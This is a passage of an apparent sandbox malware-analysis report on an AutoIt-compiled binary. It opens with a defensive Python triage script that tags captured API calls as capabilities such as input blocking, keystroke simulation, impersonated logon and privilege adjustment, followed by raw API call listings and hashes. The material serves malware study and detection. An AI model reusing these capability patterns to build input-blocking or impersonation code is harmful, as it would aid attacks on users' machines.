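The records above are raw per-function API sequences; the capabilities the report's signature summary names (blocking input, simulating keystrokes and mouse events, logging on as another user, adjusting token privileges, checking group membership) are what a reviewer actually reads out of them. The following Python triage script is an added example, not part of the Joe Sandbox report and not the sandbox's own signature engine: it parses "APIs" blocks in this listing's layout into per-function call sets and tags them. The constructed sample is a handful of records copied from this section; the regex, the capability table and the tag names are assumptions made for the example. The Administrators check recognises the AllocateAndInitializeSid(…, 2, 0x20, 0x220, …) + CheckTokenMembership idiom for BUILTIN\Administrators (S-1-5-32-544); the identifier-authority argument is a pointer the listing shows as "?", so SECURITY_NT_AUTHORITY is assumed rather than verified.

```python
"""Triage helper for a Joe Sandbox function listing.

Added example, not part of the report: parses the "APIs" records (bullet lines
of the form `Api.MODULE(args), ref: ADDR`) into per-function API sets and maps
them to reviewer-facing capability tags. The listing regex, capability table
and tag names are assumptions made for this example.
"""
import re
from collections import defaultdict

# Constructed sample: a few records copied in the listing's own layout.
SAMPLE = """\
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00F54F45
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F54F5C
• FreeSid.ADVAPI32(?), ref: 00F54F6C
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F51B01
• keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00F51B14
APIs
• BlockInput.USER32(00000001), ref: 00F645F0
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00F48FA7), ref: 00F49389
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F48F27), ref: 00F48DFE
• CloseHandle.KERNEL32(?,?,00F48F27), ref: 00F48E10
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00F30734
"""

# One API line. "Part of subcall function XXXX:" lines are folded into the
# calling function, which is how the report attributes them.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Capability tags (assumed names) keyed by the APIs that evidence them.
CAPABILITIES = {
    "blocks-user-input": {"BlockInput"},
    "simulates-keystrokes": {"SendInput", "keybd_event"},
    "simulates-mouse": {"mouse_event"},
    "logs-on-as-other-user": {"LogonUserW", "LogonUserA"},
    "adjusts-token-privileges": {"AdjustTokenPrivileges"},
    "queries-user-name": {"GetUserNameW", "GetUserNameA"},
}

# Sub-authorities of BUILTIN\Administrators (S-1-5-32-544).
SECURITY_BUILTIN_DOMAIN_RID = 0x20
DOMAIN_ALIAS_RID_ADMINS = 0x220


def parse_functions(text):
    """Split the listing into functions; each is a list of
    (api, module, [args...], ref) tuples in call order."""
    funcs = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            funcs.append([])
            continue
        m = API_RE.match(line)
        if m and funcs:
            args = [a.strip() for a in m["args"].split(",")]
            funcs[-1].append((m["api"], m["mod"], args, m["ref"]))
    return funcs


def is_admin_group_check(func):
    """True for the 'is the caller in BUILTIN\\Administrators' idiom:
    AllocateAndInitializeSid with two sub-authorities 0x20, 0x220 followed by
    CheckTokenMembership. The identifier authority is a pointer the listing
    shows as '?', so SECURITY_NT_AUTHORITY is assumed, not verified."""
    apis = {call[0] for call in func}
    if "CheckTokenMembership" not in apis:
        return False
    for api, _mod, args, _ref in func:
        if api != "AllocateAndInitializeSid" or len(args) < 4:
            continue
        try:
            count, sub0, sub1 = (int(a, 16) for a in args[1:4])
        except ValueError:  # unresolved '?' arguments
            continue
        if (count == 2 and sub0 == SECURITY_BUILTIN_DOMAIN_RID
                and sub1 == DOMAIN_ALIAS_RID_ADMINS):
            return True
    return False


def triage(text):
    """Return {tag: [ref of the first call in each matching function, ...]}."""
    hits = defaultdict(list)
    for func in parse_functions(text):
        if not func:
            continue
        entry_ref = func[0][3]  # identifies the function in the report
        apis = {call[0] for call in func}
        for tag, evidence in CAPABILITIES.items():
            if apis & evidence:
                hits[tag].append(entry_ref)
        if is_admin_group_check(func):
            hits["checks-administrators-membership"].append(entry_ref)
    return {tag: sorted(refs) for tag, refs in sorted(hits.items())}


if __name__ == "__main__":
    for tag, refs in triage(SAMPLE).items():
        print(f"{tag:36s} {', '.join(refs)}")
```

Run against the full listing, the refs it emits are the addresses to open in the dump (base 00EF0000 here) when confirming a signature by hand; a tag fired by a single benign-looking API (GetUserNameW, AdjustTokenPrivileges) is a lead, not a verdict, and should be read together with the strings and the callers of that function.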
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?), ref: 00EF3072
                                                    • DeleteObject.GDI32(00000000), ref: 00EF30B8
                                                    • DeleteObject.GDI32(00000000), ref: 00EF30C3
                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00EF30CE
                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00EF30D9
                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F2C77C
                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F2C7B5
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F2CBDE
                                                      • Part of subcall function 00EF1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EF2412,?,00000000,?,?,?,?,00EF1AA7,00000000,?), ref: 00EF1F76
                                                    • SendMessageW.USER32(?,00001053), ref: 00F2CC1B
                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F2CC32
                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00F2CC48
                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00F2CC53
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                    • String ID: 0
                                                    • API String ID: 464785882-4108050209
                                                    • Opcode ID: d7639ec2b97b308587e1309a94b5c8b77010c9c739c40d09ea841617ce8e8e10
                                                    • Instruction ID: d9f056d23a6be64f8e05e6ed068fa0005d4ddd9d5ddeec0baf0215ba0ebd2022
                                                    • Opcode Fuzzy Hash: d7639ec2b97b308587e1309a94b5c8b77010c9c739c40d09ea841617ce8e8e10
                                                    • Instruction Fuzzy Hash: DF129D30A00215EFDB24CF24D894BB9BBE1BF48310F54856AE685DB262CB31ED45EF91
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                    • API String ID: 2660009612-1645009161
                                                    • Opcode ID: 7c130a3103552b7a874e97d3c30e20975f84dbd6a219b65dc9abde9e319a2513
                                                    • Instruction ID: dce3fb956c3f382de4941825be38c427645b14306155f2d017f252b200894451
                                                    • Opcode Fuzzy Hash: 7c130a3103552b7a874e97d3c30e20975f84dbd6a219b65dc9abde9e319a2513
                                                    • Instruction Fuzzy Hash: 47A1BF31E40209ABCB54AF20CD86EBE7BA9AF45750F044029F805AB2D2EB74DE45F761
                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 00F67BC8
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F67C87
                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00F67CC5
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00F67CD7
                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00F67D1D
                                                    • GetClientRect.USER32(00000000,?), ref: 00F67D29
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00F67D6D
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F67D7C
                                                    • GetStockObject.GDI32(00000011), ref: 00F67D8C
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00F67D90
                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00F67DA0
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F67DA9
                                                    • DeleteDC.GDI32(00000000), ref: 00F67DB2
                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F67DDE
                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00F67DF5
                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00F67E30
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F67E44
                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00F67E55
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00F67E85
                                                    • GetStockObject.GDI32(00000011), ref: 00F67E90
                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F67E9B
                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00F67EA5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-517079104
                                                    • Opcode ID: 34beed7c8ec2ff587b869b27f01cd4c00bb6d215b14ab54757955542d85a91ef
                                                    • Instruction ID: 34f2d823a68d3d98c643dbcad7de6ab6cd8ee843315ee03d6c9c02e3fb497359
                                                    • Opcode Fuzzy Hash: 34beed7c8ec2ff587b869b27f01cd4c00bb6d215b14ab54757955542d85a91ef
                                                    • Instruction Fuzzy Hash: C1A160B1A00619BFEB14DB64DC8AFBE7BA9EB44710F004214FA15A72E0DB70AD04DF64
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 00F5B361
                                                    • GetDriveTypeW.KERNEL32(?,00F82C4C,?,\\.\,00F80980), ref: 00F5B43E
                                                    • SetErrorMode.KERNEL32(00000000,00F82C4C,?,\\.\,00F80980), ref: 00F5B59C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DriveType
                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                    • API String ID: 2907320926-4222207086
                                                    • Opcode ID: 12c0501794d38170d60ca63408fb7b90417ea0beaa70108c80de8da90a43a34b
                                                    • Instruction ID: d7876b72197381c317da4d5578b39ceb95435a675b189dd38a81068c8d3578b3
                                                    • Opcode Fuzzy Hash: 12c0501794d38170d60ca63408fb7b90417ea0beaa70108c80de8da90a43a34b
                                                    • Instruction Fuzzy Hash: 5E51D471B4020DEBC714DF20CD42ABD77A0AB45392F284015FE06A7692E775EE89FB52
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00F7A0F7
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00F7A1B0
                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 00F7A1CC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: 0
                                                    • API String ID: 2326795674-4108050209
                                                    • Opcode ID: 133d3314bb867439dabe3c18aa67257a8dca2e4025bc85f2055830fd1ec325f4
                                                    • Instruction ID: 542eee46934c30e00eac8206a2a63dbb5d8d3f775431062dd3578b1ab704e441
                                                    • Opcode Fuzzy Hash: 133d3314bb867439dabe3c18aa67257a8dca2e4025bc85f2055830fd1ec325f4
                                                    • Instruction Fuzzy Hash: 1D02DA31508200AFEB15CF14C848BAEBBE5FF85324F09851AF999962A1CB75D854EF53
                                                    APIs
                                                    • GetSysColor.USER32(00000012), ref: 00F7AF51
                                                    • SetTextColor.GDI32(?,?), ref: 00F7AF55
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00F7AF6B
                                                    • GetSysColor.USER32(0000000F), ref: 00F7AF76
                                                    • CreateSolidBrush.GDI32(?), ref: 00F7AF7B
                                                    • GetSysColor.USER32(00000011), ref: 00F7AF93
                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F7AFA1
                                                    • SelectObject.GDI32(?,00000000), ref: 00F7AFB2
                                                    • SetBkColor.GDI32(?,00000000), ref: 00F7AFBB
                                                    • SelectObject.GDI32(?,?), ref: 00F7AFC8
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00F7AFE7
                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F7AFFE
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00F7B013
                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F7B05F
                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F7B086
                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00F7B0A4
                                                    • DrawFocusRect.USER32(?,?), ref: 00F7B0AF
                                                    • GetSysColor.USER32(00000011), ref: 00F7B0BD
                                                    • SetTextColor.GDI32(?,00000000), ref: 00F7B0C5
                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F7B0D9
                                                    • SelectObject.GDI32(?,00F7AC1F), ref: 00F7B0F0
                                                    • DeleteObject.GDI32(?), ref: 00F7B0FB
                                                    • SelectObject.GDI32(?,?), ref: 00F7B101
                                                    • DeleteObject.GDI32(?), ref: 00F7B106
                                                    • SetTextColor.GDI32(?,?), ref: 00F7B10C
                                                    • SetBkColor.GDI32(?,?), ref: 00F7B116
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 1996641542-0
                                                    • Opcode ID: 18c8281dc56947c1de183952ac86222da2586824d67c9ef384089dae9285d0ab
                                                    • Instruction ID: f5b64808da691ca393300e7cd1156097113134895701b0c64b887e2bc0e08887
                                                    • Opcode Fuzzy Hash: 18c8281dc56947c1de183952ac86222da2586824d67c9ef384089dae9285d0ab
                                                    • Instruction Fuzzy Hash: 42617B72D00218AFDF119FA4DC48EEE7B79EF08320F118116F919AB2A1DB759944EF90
                                                    APIs
                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F790EA
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F790FB
                                                    • CharNextW.USER32(0000014E), ref: 00F7912A
                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F7916B
                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F79181
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F79192
                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F791AF
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00F791FB
                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F79211
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F79242
                                                    • _memset.LIBCMT ref: 00F79267
                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F792B0
                                                    • _memset.LIBCMT ref: 00F7930F
                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F79339
                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F79391
                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00F7943E
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F79460
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F794AA
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F794D7
                                                    • DrawMenuBar.USER32(?), ref: 00F794E6
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00F7950E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                    • String ID: 0
                                                    • API String ID: 1073566785-4108050209
                                                    • Opcode ID: 16a01449e6a62f6d82cbaa1ebd3fbc55e54aafe16fd56210e7e623516b10e1c9
                                                    • Instruction ID: a92cb7be2ad9a92d0547c5c006ecde39e4dbf3666936f8bc1936d285a38c4394
                                                    • Opcode Fuzzy Hash: 16a01449e6a62f6d82cbaa1ebd3fbc55e54aafe16fd56210e7e623516b10e1c9
                                                    • Instruction Fuzzy Hash: 67E1A371904218AFDF11DF60CC84EFE7BB8EF05720F14815AF919AA191DBB48A85EF52
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 00F75007
                                                    • GetDesktopWindow.USER32 ref: 00F7501C
                                                    • GetWindowRect.USER32(00000000), ref: 00F75023
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F75085
                                                    • DestroyWindow.USER32(?), ref: 00F750B1
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F750DA
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F750F8
                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F7511E
                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00F75133
                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F75146
                                                    • IsWindowVisible.USER32(?), ref: 00F75166
                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F75181
                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F75195
                                                    • GetWindowRect.USER32(?,?), ref: 00F751AD
                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00F751D3
                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00F751ED
                                                    • CopyRect.USER32(?,?), ref: 00F75204
                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00F7526F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                    • String ID: ($0$tooltips_class32
                                                    • API String ID: 698492251-4156429822
                                                    • Opcode ID: e5d7d8cb68b655617f126e87e00d96474755767ec0a12fc8a684223f776be79a
                                                    • Instruction ID: c9914310cc6b826266502c2d4f026b8931af579fc84779281e5b4ab16e5a1648
                                                    • Opcode Fuzzy Hash: e5d7d8cb68b655617f126e87e00d96474755767ec0a12fc8a684223f776be79a
                                                    • Instruction Fuzzy Hash: F2B17B71604741AFDB44DF64C844B6BBBE4BF88710F008A1DF59DAB291DBB1E805DB92
                                                    APIs
                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00F5499C
                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00F549C2
                                                    • _wcscpy.LIBCMT ref: 00F549F0
                                                    • _wcscmp.LIBCMT ref: 00F549FB
                                                    • _wcscat.LIBCMT ref: 00F54A11
                                                    • _wcsstr.LIBCMT ref: 00F54A1C
                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00F54A38
                                                    • _wcscat.LIBCMT ref: 00F54A81
                                                    • _wcscat.LIBCMT ref: 00F54A88
                                                    • _wcsncpy.LIBCMT ref: 00F54AB3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                    • API String ID: 699586101-1459072770
                                                    • Opcode ID: 8d01c07d9e77b71c6eea1c77101c0c69425497a5372f5627c554f80fefa12cd0
                                                    • Instruction ID: d0a2296d0b6ea3293c0cb169acdc5969a80fad9e34b98aa56167f4fba826567f
                                                    • Opcode Fuzzy Hash: 8d01c07d9e77b71c6eea1c77101c0c69425497a5372f5627c554f80fefa12cd0
                                                    • Instruction Fuzzy Hash: FE410B72A042047AD751BB608C47EFF776CDF45720F000059FE04A6193EB38EA9577A6
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EF2C8C
                                                    • GetSystemMetrics.USER32(00000007), ref: 00EF2C94
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EF2CBF
                                                    • GetSystemMetrics.USER32(00000008), ref: 00EF2CC7
                                                    • GetSystemMetrics.USER32(00000004), ref: 00EF2CEC
                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00EF2D09
                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00EF2D19
                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00EF2D4C
                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00EF2D60
                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00EF2D7E
                                                    • GetStockObject.GDI32(00000011), ref: 00EF2D9A
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00EF2DA5
                                                      • Part of subcall function 00EF2714: GetCursorPos.USER32(?), ref: 00EF2727
                                                      • Part of subcall function 00EF2714: ScreenToClient.USER32(00FB77B0,?), ref: 00EF2744
                                                      • Part of subcall function 00EF2714: GetAsyncKeyState.USER32(00000001), ref: 00EF2769
                                                      • Part of subcall function 00EF2714: GetAsyncKeyState.USER32(00000002), ref: 00EF2777
                                                    • SetTimer.USER32(00000000,00000000,00000028,00EF13C7), ref: 00EF2DCC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
